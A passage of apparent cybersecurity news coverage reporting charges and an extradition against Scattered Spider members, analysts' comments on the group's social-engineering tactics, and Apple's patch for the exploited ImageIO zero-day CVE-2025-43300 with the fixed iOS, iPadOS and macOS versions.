These incidents led to the theft of at least $800,000 from at least five different victims, per the U.S. Department of Justice (DoJ). Prosecutors said Urban and his co-conspirators engaged in SIM swapping attacks to hijack victims’ cryptocurrency accounts and plunder the digital assets. Later that November, the DoJ unsealed criminal charges against Urban and four other members of Scattered Spider for using social engineering techniques to target employees of companies across the U.S. and to break into corporate networks, steal proprietary data, and siphon millions of dollars in cryptocurrency. Tyler Robert Buchanan, who is among those indicted, was extradited from Spain to the U.S. in April following his arrest in the European nation last June. The development comes as Scattered Spider has joined forces with other threat groups ShinyHunters and LAPSUS$ to form a new cybercrime alliance.
The group, associated with a broader English-speaking cybercriminal collective called The Com, has a history of conducting social engineering, credential theft, and SIM swapping, initial access, ransomware deployment, data theft, and extortion attacks. “Scattered Spider has historically leaned on tactics that generate urgency, drive media and industry attention, create fear of exposure, and help force victims to payout quicker,” Adam Darrah, vice president of intelligence at ZeroFox, told The Hacker News in a statement. “Timed leaks, countdown threats, and taunts directed at security firms are all part of their playbook. They have ties to a wider network of like-minded actors, which has given them access to more tools, data, and infrastructure, multiplying their effectiveness.
We regularly see groups team up when there is an increase in external pressures, like law enforcement crackdowns. To survive, these groups need to consolidate. And the result is often a more versatile and potentially dangerous combined operation.” Cybersecurity firm Flashpoint, which published a profile of Scattered Spider last week, said the financially motivated hacking group adopts a wave-like approach by choosing a specific sector and attacking as many organizations within that vertical as possible over a short span of time. “The tactics employed by Scattered Spider demonstrate their ability to exploit weaknesses in security programs by targeting people rather than strictly systems or technical vulnerabilities,” it said.
“Their use of social engineering, via vishing, smishing, and MFA fatigue attacks, proves that even the most advanced technical defenses can be circumvented through human deception.”
Apple Patches CVE-2025-43300 Zero-Day in iOS, iPadOS, and macOS Exploited in Targeted Attacks
Apple has released security updates to address a security flaw impacting iOS, iPadOS, and macOS that it said has come under active exploitation in the wild. The zero-day out-of-bounds write vulnerability, tracked as CVE-2025-43300 (CVSS score: 8.8), resides in the ImageIO framework and could result in memory corruption when processing a malicious image. “Apple is aware of a report that this issue may have been exploited in an extremely sophisticated attack against specific targeted individuals,” the company said in an advisory. The iPhone maker said the bug was internally discovered and that it was addressed with improved bounds checking.
The following versions address the security defect -
- iOS 18.6.2 and iPadOS 18.6.2 - iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 7th generation and later, and iPad mini 5th generation and later
- iPadOS 17.7.10 - iPad Pro 12.9-inch 2nd generation, iPad Pro 10.5-inch, and iPad 6th generation
- macOS Ventura 13.7.8 - Macs running macOS Ventura
- macOS Sonoma 14.7.8 - Macs running macOS Sonoma
- macOS Sequoia 15.6.1 - Macs running macOS Sequoia
It’s currently not known who is behind the attacks and who may have been targeted, but it’s likely that the vulnerability has been weaponised as part of highly targeted attacks. With the latest update, Apple has so far fixed a total of seven zero-days that have been abused in real-world attacks since the start of the year: CVE-2025-24085, CVE-2025-24200, CVE-2025-24201, CVE-2025-31200, CVE-2025-31201, and CVE-2025-43200. Last month, the company also issued patches for a Safari vulnerability residing in an open-source component (CVE-2025-6558) that Google reported as having been exploited as a zero-day in the Chrome web browser.